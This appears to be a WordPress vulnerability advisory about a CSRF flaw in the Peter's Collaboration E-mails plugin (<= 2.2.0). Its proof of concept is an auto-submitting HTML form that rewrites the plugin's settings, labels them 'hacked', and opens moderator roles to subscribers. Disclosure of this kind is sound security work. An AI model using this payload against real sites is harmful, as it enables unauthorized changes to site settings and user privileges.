WordPress Plugin Vulnerabilities

Peter’s Collaboration E-mails <= 2.2.0 - Arbitrary Settings Update via CSRF

Description

The plugin is vulnerable to CSRF due to missing nonce checks. This allows the change of its settings, which can be used to lower the required user level, change texts, the used email address and more.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=peters_collaboration_emails.php" method="POST">
    <input type="text" name="pce_blogname" value="hacked">
    <input type="text" name="pce_fromaddress" value="[email protected]">
    <input type="text" name="pce_fromname" value="hacked">
    <input type="text" name="pce_whoapproved" value="1">
    <input type="text" name="pce_contributor_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="administrator">
    <input type="text" name="pce_moderator_roles[]" value="author">
    <input type="text" name="pce_moderator_roles[]" value="contributor">
    <input type="text" name="pce_moderator_roles[]" value="editor">
    <input type="text" name="pce_moderator_roles[]" value="subscriber">
    <input type="text" name="pce_emails_to_send[]" value="pending">
    <input type="text" name="pce_emails_to_send[]" value="approved">
    <input type="text" name="pce_emails_to_send[]" value="future">
    <input type="text" name="pce_emails_to_send[]" value="backtodraft">
    <input type="text" name="pce_emails_to_send[]" value="wentlive">
    <input type="text" name="pce_emails_to_send[]" value="private_to_published">
    <input type="text" name="pce_emails_to_send[]" value="edited">
    <input type="text" name="pce_required_capability" value="level_0">
    <input type="text" name="pce_settingssubmit" value="Aktualisieren">
</form>
<script>
    document.getElementById("test").submit();
</script>